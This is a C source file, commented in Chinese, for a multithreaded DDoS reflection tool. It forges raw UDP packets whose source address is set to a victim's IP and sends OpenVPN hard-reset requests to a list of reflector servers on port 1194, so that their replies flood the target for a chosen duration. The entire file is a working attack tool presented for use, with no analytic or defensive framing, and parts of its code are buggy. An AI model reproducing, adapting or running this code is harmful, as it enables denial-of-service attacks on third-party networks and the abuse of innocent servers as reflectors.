﻿#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>

#define MAX_PACKET_SIZE 256
#define OPENVPN_HDR_SIZE 48
#define PHI 0x9e3779b9

static uint32_t Q[4096], c = 362436;

struct list {
    struct sockaddr_in data;
    struct list *next;
    struct list *prev;
};

struct thread_data { 
    int thread_id; 
    struct list *list_node; 
    struct sockaddr_in sin; 
};

// OpenVPN硬重置协议头
static const unsigned char openvpn_reset_pkt[OPENVPN_HDR_SIZE] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // HMAC（空）
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x38,                                             // Opcode: P_CONTROL_HARD_RESET_CLIENT_V2
    0x00, 0x00, 0x00,                                 // Reserved
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Session ID
    0x00, 0x00, 0x00, 0x00,                          // Packet ID
    0x00, 0x00, 0x00, 0x00,                          // Timestamp
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Payload
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00
};

void init_rand(uint32_t x) {
    int i;
    Q[0] = x;
    Q[1] = x + PHI;
    Q[2] = x + PHI + PHI;
    for (i = 3; i < 4096; i++)
        Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}

uint32_t rand_cmwc(void) {
    uint64_t t, a = 18782LL;
    static uint32_t i = 4095;
    uint32_t x, r = 0xfffffffe;
    i = (i + 1) & 4095;
    t = a * Q[i] + c;
    c = (t >> 32);
    x = t + c;
    if (x < c) { x++; c++; }
    return (Q[i] = r - x);
}

unsigned short csum(unsigned short *buf, int nwords) {
    unsigned long sum;
    for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

void setup_ip_header(struct iphdr *iph, struct sockaddr_in target) {
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + OPENVPN_HDR_SIZE);
    iph->id = htonl(54321);
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_UDP;
    iph->check = 0;
    iph->saddr = target.sin_addr.s_addr; // 伪造源地址
}

void setup_udp_header(struct udphdr *udph, int dest_port) {
    udph->source = htons(5678); // 随机源端口
    udph->dest = htons(dest_port);
    udph->check = 0;
    udph->len = htons(sizeof(struct udphdr) + OPENVPN_HDR_SIZE);
}

void *flood(void *par1) {
    struct thread_data *td = (struct thread_data *)par1;
    if (td == NULL) {
        fprintf(stderr, "[!] Invalid thread data\n");
        pthread_exit(NULL);
    }

    char datagram[MAX_PACKET_SIZE];
    struct iphdr *iph = (struct iphdr *)datagram;
    struct udphdr *udph = (struct udphdr *)(iph + 1);
    void *payload = (void *)(udph + 1);

    int s = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("[!] 创建原始套接字失败");
        pthread_exit(NULL);
    }

    int tmp = 1;
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof(tmp)) < 0) {
        perror("[!] 设置IP_HDRINCL失败");
        close(s);
        pthread_exit(NULL);
    }

    init_rand(time(NULL));
    memset(datagram, 0, MAX_PACKET_SIZE);
    setup_ip_header(iph, td->sin);
    setup_udp_header(udph, ntohs(td->sin.sin_port));
    memcpy(payload, openvpn_reset_pkt, OPENVPN_HDR_SIZE);

    pthread_mutex_t list_mutex = PTHREAD_MUTEX_INITIALIZER;

    while (1) {
        pthread_mutex_lock(&list_mutex);
        struct list *current = td->list_node;
        do {
            iph->daddr = current->data.sin_addr.s_addr;
            iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

            struct sockaddr_in sin = current->data;
            if (sendto(s, datagram, ntohs(iph->tot_len), 0, 
                      (struct sockaddr *)&sin, sizeof(sin)) < 0) {
                perror("[!] 发送失败");
            }

            current = current->next;
        } while (current != td->list_node);
        pthread_mutex_unlock(&list_mutex);

        usleep(10000); // 调整发包间隔
    }

    close(s);
    free(td); // 释放线程数据结构
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 5) {
        fprintf(stderr, "使用方法: %s <目标IP> <目标端口> <反射列表> <线程数> [持续时间]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    // 初始化反射服务器列表
    struct list *head = NULL;
    FILE *fp = fopen(argv[3], "r");
    if (!fp) {
        perror("[!] 打开反射服务器列表失败");
        exit(EXIT_FAILURE);
    }

    char line[128];
    while (fgets(line, sizeof(line), fp)) {
        char *ip = strtok(line, "\r\n");
        if (!ip) continue;

        struct list *node = malloc(sizeof(struct list));
        if (node == NULL) {
            perror("[!] Memory allocation failed");
            exit(EXIT_FAILURE);
        }
        memset(node, 0, sizeof(struct list));
        if (inet_pton(AF_INET, ip, &node->data.sin_addr) <= 0) {
            free(node);
            continue;
        }
        node->data.sin_family = AF_INET;
        node->data.sin_port = htons(1194);

        if (!head) {
            head = node;
            head->next = head;
            head->prev = head;
        } else {
            node->next = head->next;
            node->prev = head;
            head->next->prev = node;
            head->next = node;
        }
    }
    fclose(fp);

    // 初始化目标地址
    struct sockaddr_in target;
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(atoi(argv[2]));
    if (inet_pton(AF_INET, argv[1], &target.sin_addr) <= 0) {
        fprintf(stderr, "[!] Invalid target IP\n");
        exit(EXIT_FAILURE);
    }

    // 创建攻击线程
    int num_threads = atoi(argv[4]);
    pthread_t threads[num_threads];
    struct thread_data td[num_threads];

    for (int i = 0; i < num_threads; i++) {
        td[i].thread_id = i;
        td[i].sin = target;
        td[i].list_node = head;
        if (pthread_create(&threads[i], NULL, &flood, (void *)&td[i])) {
            perror("[!] 创建线程失败");
            exit(EXIT_FAILURE);
        }
    }

    // 运行指定时间
    if (argc > 5) {
        sleep(atoi(argv[5]));
    } else {
        while (1) pause();
    }

    return 0;
}
